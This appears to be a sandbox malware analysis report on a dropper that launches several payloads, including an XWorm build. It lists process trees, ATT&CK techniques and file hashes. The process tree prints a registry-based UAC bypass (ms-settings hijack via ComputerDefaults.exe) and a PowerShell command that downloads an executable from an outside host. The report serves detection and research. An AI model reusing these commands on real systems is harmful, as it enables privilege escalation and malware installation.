PID 2280 wrote to memory of 1620	2280	New Text Document mod.exe	33
PID 1620 wrote to memory of 1956	1620	Tq4a1Bz.exe	35
PID 1620 wrote to memory of 1956	1620	Tq4a1Bz.exe	35
PID 1620 wrote to memory of 1956	1620	Tq4a1Bz.exe	35
PID 1620 wrote to memory of 1956	1620	Tq4a1Bz.exe	35
PID 1620 wrote to memory of 1956	1620	Tq4a1Bz.exe	35
PID 1620 wrote to memory of 1956	1620	Tq4a1Bz.exe	35
PID 1620 wrote to memory of 1956	1620	Tq4a1Bz.exe	35
PID 1620 wrote to memory of 1956	1620	Tq4a1Bz.exe	35
PID 1620 wrote to memory of 1956	1620	Tq4a1Bz.exe	35
PID 1620 wrote to memory of 1956	1620	Tq4a1Bz.exe	35
PID 2280 wrote to memory of 3044	2280	New Text Document mod.exe	37
PID 2280 wrote to memory of 3044	2280	New Text Document mod.exe	37
PID 2280 wrote to memory of 3044	2280	New Text Document mod.exe	37
PID 3044 wrote to memory of 1612	3044	fHR9z2C.exe	38
PID 3044 wrote to memory of 1612	3044	fHR9z2C.exe	38
PID 3044 wrote to memory of 1612	3044	fHR9z2C.exe	38
PID 1612 wrote to memory of 1728	1612	cmd.exe	40
PID 1612 wrote to memory of 1728	1612	cmd.exe	40
PID 1612 wrote to memory of 1728	1612	cmd.exe	40
PID 3044 wrote to memory of 2396	3044	fHR9z2C.exe	42
PID 3044 wrote to memory of 2396	3044	fHR9z2C.exe	42
PID 3044 wrote to memory of 2396	3044	fHR9z2C.exe	42
PID 2396 wrote to memory of 2456	2396	cmd.exe	44
PID 2396 wrote to memory of 2456	2396	cmd.exe	44
PID 2396 wrote to memory of 2456	2396	cmd.exe	44
PID 2396 wrote to memory of 3036	2396	cmd.exe	45
PID 2396 wrote to memory of 3036	2396	cmd.exe	45
PID 2396 wrote to memory of 3036	2396	cmd.exe	45
PID 3044 wrote to memory of 2324	3044	fHR9z2C.exe	46
PID 3044 wrote to memory of 2324	3044	fHR9z2C.exe	46
PID 3044 wrote to memory of 2324	3044	fHR9z2C.exe	46
PID 2324 wrote to memory of 1020	2324	cmd.exe	48
PID 2324 wrote to memory of 1020	2324	cmd.exe	48
PID 2324 wrote to memory of 1020	2324	cmd.exe	48
PID 3044 wrote to memory of 2400	3044	fHR9z2C.exe	49
PID 3044 wrote to memory of 2400	3044	fHR9z2C.exe	49
PID 3044 wrote to memory of 2400	3044	fHR9z2C.exe	49
PID 3044 wrote to memory of 1124	3044	fHR9z2C.exe	51
PID 3044 wrote to memory of 1124	3044	fHR9z2C.exe	51
PID 3044 wrote to memory of 1124	3044	fHR9z2C.exe	51
PID 1124 wrote to memory of 340	1124	cmd.exe	53
PID 1124 wrote to memory of 340	1124	cmd.exe	53
PID 1124 wrote to memory of 340	1124	cmd.exe	53
PID 3044 wrote to memory of 1656	3044	fHR9z2C.exe	54
PID 3044 wrote to memory of 1656	3044	fHR9z2C.exe	54
PID 3044 wrote to memory of 1656	3044	fHR9z2C.exe	54
PID 1656 wrote to memory of 1052	1656	cmd.exe	56
PID 1656 wrote to memory of 1052	1656	cmd.exe	56
PID 1656 wrote to memory of 1052	1656	cmd.exe	56
PID 3044 wrote to memory of 2188	3044	fHR9z2C.exe	57
PID 3044 wrote to memory of 2188	3044	fHR9z2C.exe	57
PID 3044 wrote to memory of 2188	3044	fHR9z2C.exe	57
PID 2188 wrote to memory of 1648	2188	cmd.exe	59
PID 2188 wrote to memory of 1648	2188	cmd.exe	59
PID 2188 wrote to memory of 1648	2188	cmd.exe	59
PID 2188 wrote to memory of 1664	2188	cmd.exe	60

C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe
"C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe"
1⤵
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2280
- C:\Users\Admin\AppData\Local\Temp\a\UqhRb9F.exe
  "C:\Users\Admin\AppData\Local\Temp\a\UqhRb9F.exe"
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Executes dropped EXE
  - Identifies Wine through registry keys
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of SetWindowsHookEx
  PID:3060
- C:\Users\Admin\AppData\Local\Temp\a\Tq4a1Bz.exe
  "C:\Users\Admin\AppData\Local\Temp\a\Tq4a1Bz.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of SetThreadContext
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:1620
- - C:\Users\Admin\AppData\Local\Temp\a\Tq4a1Bz.exe
    "C:\Users\Admin\AppData\Local\Temp\a\Tq4a1Bz.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:1956
- C:\Users\Admin\AppData\Local\Temp\a\wKQeiIr.exe
  "C:\Users\Admin\AppData\Local\Temp\a\wKQeiIr.exe"
  2⤵
  - Executes dropped EXE
  PID:2008
- C:\Users\Admin\AppData\Local\Temp\a\fHR9z2C.exe
  "C:\Users\Admin\AppData\Local\Temp\a\fHR9z2C.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:3044
- - C:\Windows\system32\cmd.exe
    /c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1612
  - - C:\Windows\system32\reg.exe
      reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
      4⤵
      PID:1728
- - C:\Windows\system32\cmd.exe
    /c reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\8172.vbs" /f & reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2396
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\8172.vbs" /f
      4⤵
      PID:2456
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f
      4⤵
      PID:3036
- - C:\Windows\system32\cmd.exe
    /c start /B ComputerDefaults.exe
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2324
  - - C:\Windows\system32\ComputerDefaults.exe
      ComputerDefaults.exe
      4⤵
      Suspicious use of FindShellTrayWindow
      PID:1020
    - - C:\Windows\System32\ie4uinit.exe
        
        "C:\Windows\System32\ie4uinit.exe" -reinstall
        5⤵
        Boot or Logon Autostart Execution: Active Setup
        Modifies Internet Explorer settings
        Modifies registry class
        
        PID:1664
    - - C:\Windows\system32\unregmp2.exe
        
        C:\Windows\system32\unregmp2.exe /SetWMPAsDefault
        5⤵
        Modifies Internet Explorer settings
        Modifies registry class
        
        PID:1740
- - C:\Windows\system32\cmd.exe
    /c del /f C:\Users\Admin\AppData\Local\Temp\8172.vbs
    3⤵
    PID:2400
- - C:\Windows\system32\cmd.exe
    /c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1124
  - - C:\Windows\system32\reg.exe
      reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
      4⤵
      PID:340
- - C:\Windows\system32\cmd.exe
    /c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1656
  - - C:\Windows\system32\reg.exe
      reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
      4⤵
      PID:1052
- - C:\Windows\system32\cmd.exe
    /c reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\6359.vbs" /f & reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2188
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\6359.vbs" /f
      4⤵
      PID:1648
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f
      4⤵
      PID:1664
- - C:\Windows\system32\cmd.exe
    /c start /B ComputerDefaults.exe
    3⤵
    PID:972
  - - C:\Windows\system32\ComputerDefaults.exe
      ComputerDefaults.exe
      4⤵
      Suspicious use of FindShellTrayWindow
      PID:920
    - - C:\Windows\System32\ie4uinit.exe
        
        "C:\Windows\System32\ie4uinit.exe" -reinstall
        5⤵
        Boot or Logon Autostart Execution: Active Setup
        Modifies Internet Explorer settings
        Modifies registry class
        
        PID:2092
    - - C:\Windows\system32\unregmp2.exe
        
        C:\Windows\system32\unregmp2.exe /SetWMPAsDefault
        5⤵
        Modifies Internet Explorer settings
        Modifies registry class
        
        PID:2720
- - C:\Windows\system32\cmd.exe
    /c del /f C:\Users\Admin\AppData\Local\Temp\6359.vbs
    3⤵
    PID:1488
- - C:\Windows\system32\cmd.exe
    /c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
    3⤵
    PID:2296
  - - C:\Windows\system32\reg.exe
      reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
      4⤵
      PID:1476
- - C:\Windows\system32\cmd.exe
    /c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
    3⤵
    PID:1480
  - - C:\Windows\system32\reg.exe
      reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
      4⤵
      PID:2468
- - C:\Windows\system32\cmd.exe
    /c reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\9892.vbs" /f & reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f
    3⤵
    PID:568
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\9892.vbs" /f
      4⤵
      PID:2360
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f
      4⤵
      Modifies registry class
      PID:2500
- - C:\Windows\system32\cmd.exe
    /c start /B ComputerDefaults.exe
    3⤵
    PID:2028
  - - C:\Windows\system32\ComputerDefaults.exe
      ComputerDefaults.exe
      4⤵
      Suspicious use of FindShellTrayWindow
      PID:1660
    - - C:\Windows\System32\ie4uinit.exe
        
        "C:\Windows\System32\ie4uinit.exe" -reinstall
        5⤵
        Boot or Logon Autostart Execution: Active Setup
        Modifies registry class
        
        PID:2616
    - - C:\Windows\system32\unregmp2.exe
        
        C:\Windows\system32\unregmp2.exe /SetWMPAsDefault
        5⤵
        
        PID:2196
- - C:\Windows\system32\cmd.exe
    /c del /f C:\Users\Admin\AppData\Local\Temp\9892.vbs
    3⤵
    PID:2520
- - C:\Windows\system32\cmd.exe
    /c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
    3⤵
    PID:2024
  - - C:\Windows\system32\reg.exe
      reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
      4⤵
      Modifies registry class
      PID:1008
- C:\Users\Admin\AppData\Local\Temp\a\filer.exe
  "C:\Users\Admin\AppData\Local\Temp\a\filer.exe"
  2⤵
  - Executes dropped EXE
  PID:1436
- C:\Users\Admin\AppData\Local\Temp\a\AmLzNi.exe
  "C:\Users\Admin\AppData\Local\Temp\a\AmLzNi.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  PID:1612
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Invoke-WebRequest -Uri "https://ratsinthehole.com/vvvv/yVdlbFlx" -OutFile "C:\Users\Public\Guard.exe""
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Drops file in System32 directory
    - Suspicious use of AdjustPrivilegeToken
    PID:904
- C:\Users\Admin\AppData\Local\Temp\a\Xworm%20V5.6.exe
  "C:\Users\Admin\AppData\Local\Temp\a\Xworm%20V5.6.exe"
  2⤵
  PID:272
- C:\Users\Admin\AppData\Local\Temp\a\XClient.exe
  "C:\Users\Admin\AppData\Local\Temp\a\XClient.exe"
  2⤵
  PID:964
- C:\Users\Admin\AppData\Local\Temp\a\333.exe
  "C:\Users\Admin\AppData\Local\Temp\a\333.exe"
  2⤵
  PID:1744

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Active Setup

T1547.014

Event Triggered Execution

T1546

Component Object Model Hijacking

T1546.015

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Active Setup

T1547.014

Event Triggered Execution

T1546

Component Object Model Hijacking

T1546.015

Defense Evasion

Modify Registry

T1112

Virtualization/Sandbox Evasion

T1497

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
711af76ea08b7f6783442f5d9c7eade4

SHA1
0a88410afe8c86a5f23473d27314a3dcc879437b

SHA256
dba9065d0698a6fd7891c95284bddf603dd8cc590528761bb835bb489827c3df

SHA512
b82ff09e6e68ca7fdb6ffd947639b01a5f0c4e5167473f5f188284cbd9309688e3e00b61ccdb899efd8f5c7e352308335baef58062dad8521acc8a5ea6cd195b

Download Submit
C:\Users\Admin\AppData\Local\Temp\6359.vbs

Filesize
114B

MD5
34b33b5a437e20d03d79b62a797dfe99

SHA1
9b57b598a7e9d66157a05a44bc7c097bf5486e6c

SHA256
f920f526773c0565072fcfd250319c9dd53b9197d448b9d29307598e0fa004e1

SHA512
757be8161af2eb4af36772e2e0d912e0967540cb42ef6ef8cd85f28edb478756c99d9e7a6fef04b16e6bf63a3dc9ddb9c2adf490e8d9ae2ca0e3e9b76ef6fa6c

Download Submit
C:\Users\Admin\AppData\Local\Temp\8172.vbs

Filesize
125B

MD5
8b4ed5c47fdddbeba260ef11cfca88c6

SHA1
868f11f8ed78ebe871f9da182d053f349834b017

SHA256
170226b93ac03ac3178c0429577626add00665e1d71be650a4c46674f6e262a5

SHA512
87e5bcaa143e616c365557f5af73e131a10eb380016633b8c7e38c83b0a216a8f6768cfa0166fad208d47830808444517e57d07d850ff2bd575ca67bad9eabdf

Download Submit
C:\Users\Admin\AppData\Local\Temp\9892.vbs

Filesize
117B

MD5
bb8cfb89bce8af7384447115a115fb23

SHA1
6a0e728f4953128db9db52474ae5608ecee9c9c3

SHA256
d812291a41eddd5eac04972e66feffc44c1ee2c249d708bb282144823a6e8485

SHA512
d69901ba3cebd1fe8ed8e3d613e16a6cfbead827a9493a7edd8c62fb2915a550450ff4f47f00a8c66880ea10cd4029bceac4518d1951c19fb7ad9d7505007553

Download Submit
C:\Users\Admin\AppData\Local\Temp\CabEF60.tmp

Filesize
70KB

MD5
49aebf8cbd62d92ac215b2923fb1b9f5

SHA1
1723be06719828dda65ad804298d0431f6aff976

SHA256
b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

SHA512
bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

Download Submit
C:\Users\Admin\AppData\Local\Temp\TarEF73.tmp

Filesize
181KB

MD5
4ea6026cf93ec6338144661bf1202cd1

SHA1
a1dec9044f750ad887935a01430bf49322fbdcb7

SHA256
8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

SHA512
6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

Download Submit
C:\Users\Admin\AppData\Local\Temp\a\Tq4a1Bz.exe

Filesize
185KB

MD5
9c433a245d7737ca7fa17490e460f14e

SHA1
31e6388f4e45a97a97ac0f34c26a9858ef8dcdb9

SHA256
0b6604d2e6086f7322c634ab925bdc381fe720a2a12f254e5b63b42f89b680f7

SHA512
edaf8ff778db40dfcacd7c8cb5cef598dc7c13ebfb6b4f8e828c0697b24115f637ac510c945d31b1c4873d39fca7d8be7b03ba6dc64e665def6bf2d058a00c95

Download Submit
C:\Users\Admin\AppData\Local\Temp\a\UqhRb9F.exe

Filesize
1.7MB

MD5
cfbd38c30f1100b5213c9dd008b6e883

SHA1
03da6d72c9d92bea2b2e5c4a8538f0a3628fbe73

SHA256
25350f356b356c9ab48ebfcca67cad970d1a213f8716a1d006d339a38f0f7cc5

SHA512
a7d3bce28d0443dbe671394bd6c720f0fba28cf18ee0a5c3bfe547c3ffaebb9431ebe40749de1eb460b03696a401c167d76de99e9769e33ca62a3bf8302a5b04

Download Submit
C:\Users\Admin\AppData\Local\Temp\a\XClient.exe

Filesize
32KB

MD5
ce69d13cb31832ebad71933900d35458

SHA1
e9cadfcd08d79a2624d4a5320187ae84cf6a0148

SHA256
9effe406fd302590314a9211fda92126ea6a7721d294c93fdf755b4cdfbd0bcf

SHA512
7993e79a9aeee679c9342d36fcb7624f1e7616db59eff10ff50d00e84bbbc5d9d7c154601f8a94bed7f25888f43f6f1922b87af31a582221e9022e6a8c3b1409

Download Submit
C:\Users\Admin\AppData\Local\Temp\a\Xworm%20V5.6.exe

Filesize
9.3MB

MD5
88cc64bfe8957b2cf8dd7b53b22ed9fe

SHA1
1d2ad3864b06b2231679b4c133d2a1fa1c5a0a8c

SHA256
a2d25c62173a0c08e68297f9ef867ce1fd129f97ef5c2d57d2884828e9934edd

SHA512
41eec5878e40aaea890aa63e646ec0b9d78aa38ccf0b50d058f1fd6aa83832e0e584c095766ac7000ba08df34fe6535c6100dd2d2e5a5b0682125d259070e54a

Download Submit
C:\Users\Admin\AppData\Local\Temp\a\Xworm%20V5.6.exe

Filesize
10.0MB

MD5
c8d11f350133ea7691328c00891ab4c2

SHA1
4b22eb4bc156b466378013bee8bc4ea81cf9ce72

SHA256
41ccde6889dc9d53236e257d4e187a633129dfb112031901c03e5c69c5eb1656

SHA512
ff92786d302b911f9b6280d40288432ee08099097790624b83f71588734f5cb329715a8e6d4973b892a15021ce0c5aa4deba88cd3dfa518a83db281ebd3f6f9f

Download Submit
C:\Users\Admin\AppData\Local\Temp\a\fHR9z2C.exe

Filesize
254KB

MD5
892d97db961fa0d6481aa27c21e86a69

SHA1
1f5b0f6c77f5f7815421444acf2bdd456da67403

SHA256
c4b11faff0239bc2d192ff6e90adec2684124336e37c617c4118e7e3bc338719

SHA512
7fe31101f027f2352dea44b3ba4280e75a4359b6a822d813f9c50c0d6ef319b7c345280786c1bc794b45fbd4fa87939a79cc15b82fc7959ccce1b732f33ba241

Download Submit
C:\Users\Admin\AppData\Local\Temp\a\wKQeiIr.exe

Filesize
243KB

MD5
b73ecb016b35d5b7acb91125924525e5

SHA1
37fe45c0a85900d869a41f996dd19949f78c4ec4

SHA256
b3982e67820abc7b41818a7236232ce6de92689b76b6f152fab9ef302528566d

SHA512
0bea9890dbcd3afd2889d0e7c0f2746995169e7b424f58d4998c50bc49d2b37d30f5bd1845d3079b25f9963af2b71f136719cbd9fda37f7b85874992096b3e1d

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Internet Explorer.lnk

Filesize
1KB

MD5
cb962c9b656383db8fa5ded4d1a1c113

SHA1
0edda8ee31e3c35dff7e301e97ad37c7f5be6791

SHA256
8239ff69d45342868c5a6e110561b2e636fac947976905a014cd28268f31a98e

SHA512
51af57f8895f95d3fdfa41845eb618161a5c67f58edcbcfd02141ba84b36a121e4254a3891484bd8e016fe83b09956c70bd1f9c640c5612141659e80232aac05

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Internet Explorer (No Add-ons).lnk

Filesize
1KB

MD5
64fc02d8f9104b83fee148f0df56f3cd

SHA1
106dc0efa5fc99f4fea735251c6f60bb3b3da28b

SHA256
bde6128d9e4a2d985fe6533d8043c6cba2b8af32b68022aab902763a2387920d

SHA512
7d91b1f3453d535b7ba5284f266c590a191481e4d8ddf9c2914c5ba7c7b0da02962e5a4662a8991ef158849c62e87d6fb992dc38c23541096b0bb319a9665411

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk

Filesize
1KB

MD5
63423869f9fe7836d7b9d15984eec649

SHA1
d5d45be78bcaa0a3c7ce62010f897ef0dd21fbae

SHA256
c19d97ab9d35dca3416bbc7ab0916e8b9b7aa18ac3dbcf0696ee355165c27938

SHA512
bae376e1a0435692fa045d319e8313bf39c66348311fb38f2800da53e654f99635f449fc0bd00a3453a5219653ac87e11dfdda7f74fad25050f1c50b4e3dd62a

Download Submit
\Users\Admin\AppData\Local\Temp\a\AmLzNi.exe

Filesize
1.0MB

MD5
73507ed37d9fa2b2468f2a7077d6c682

SHA1
f4704970cedac462951aaf7cd11060885764fe21

SHA256
c33e3295dcb32888d000a2998628e82fd5b6d5ee3d7205ea246ac6357aa2bea6

SHA512
3a1031ce2daf62a054f41d226e9c9a0144ce746130db68737aaaa7930b148cbfbb99476c05504d6ebd4911f4e567ec1399005be7e64583caa636d7d94f5cd369

Download Submit
\Users\Admin\AppData\Local\Temp\a\filer.exe

Filesize
25.7MB

MD5
9096f57fa44b8f20eebf2008a9598eec

SHA1
42128a72a214368618f5693df45b901232f80496

SHA256
f4e2eeea7e5db511bfca33ffd1e26bce5d72e2a381e84bf3700938eb404f7934

SHA512
ad29f94040532ab78679ec9e50d58d8ccef3f99d5ab53ef7c654527b9b2634da4c44375b2ca2d54a83d1dd1e0fa9b1d1a13241ffe0328bea07740166927521b2

Download Submit
memory/272-234-0x0000000001320000-0x0000000002208000-memory.dmp

Filesize
14.9MB

Download
memory/904-208-0x000000001B600000-0x000000001B8E2000-memory.dmp

Filesize
2.9MB

Download
memory/904-209-0x0000000000460000-0x0000000000468000-memory.dmp

Filesize
32KB

Download
memory/964-244-0x0000000000190000-0x000000000019E000-memory.dmp

Filesize
56KB

Download
memory/1436-196-0x000000013F1C0000-0x0000000140BE1000-memory.dmp

Filesize
26.1MB

Download
memory/1956-90-0x0000000000400000-0x000000000040A000-memory.dmp

Filesize
40KB

Download
memory/1956-87-0x0000000000400000-0x000000000040A000-memory.dmp

Filesize
40KB

Download
memory/1956-84-0x0000000000400000-0x000000000040A000-memory.dmp

Filesize
40KB

Download
memory/1956-92-0x0000000000400000-0x000000000040A000-memory.dmp

Filesize
40KB

Download
memory/1956-76-0x0000000000400000-0x000000000040A000-memory.dmp

Filesize
40KB

Download
memory/1956-78-0x0000000000400000-0x000000000040A000-memory.dmp

Filesize
40KB

Download
memory/1956-104-0x0000000000400000-0x000000000040A000-memory.dmp

Filesize
40KB

Download
memory/1956-80-0x0000000000400000-0x000000000040A000-memory.dmp

Filesize
40KB

Download
memory/1956-86-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

Filesize
4KB

Download
memory/1956-82-0x0000000000400000-0x000000000040A000-memory.dmp

Filesize
40KB

Download
memory/1956-89-0x0000000000400000-0x000000000040A000-memory.dmp

Filesize
40KB

Download
memory/2280-103-0x000007FEF5EE3000-0x000007FEF5EE4000-memory.dmp

Filesize
4KB

Download
memory/2280-105-0x000007FEF5EE0000-0x000007FEF68CC000-memory.dmp

Filesize
9.9MB

Download
memory/2280-1-0x00000000009B0000-0x00000000009B8000-memory.dmp

Filesize
32KB

Download
memory/2280-2-0x000007FEF5EE0000-0x000007FEF68CC000-memory.dmp

Filesize
9.9MB

Download
memory/2280-0-0x000007FEF5EE3000-0x000007FEF5EE4000-memory.dmp

Filesize
4KB

Download
memory/3060-184-0x00000000027A0000-0x00000000027AC000-memory.dmp

Filesize
48KB

Download
memory/3060-115-0x0000000008A80000-0x0000000008B7A000-memory.dmp

Filesize
1000KB

Download
memory/3060-109-0x0000000000030000-0x0000000000490000-memory.dmp

Filesize
4.4MB

Download
memory/3060-66-0x0000000000030000-0x0000000000490000-memory.dmp

Filesize
4.4MB

Download
memory/3060-65-0x0000000000030000-0x0000000000490000-memory.dmp

Filesize
4.4MB

Download
memory/3060-64-0x0000000000030000-0x0000000000490000-memory.dmp

Filesize
4.4MB

Download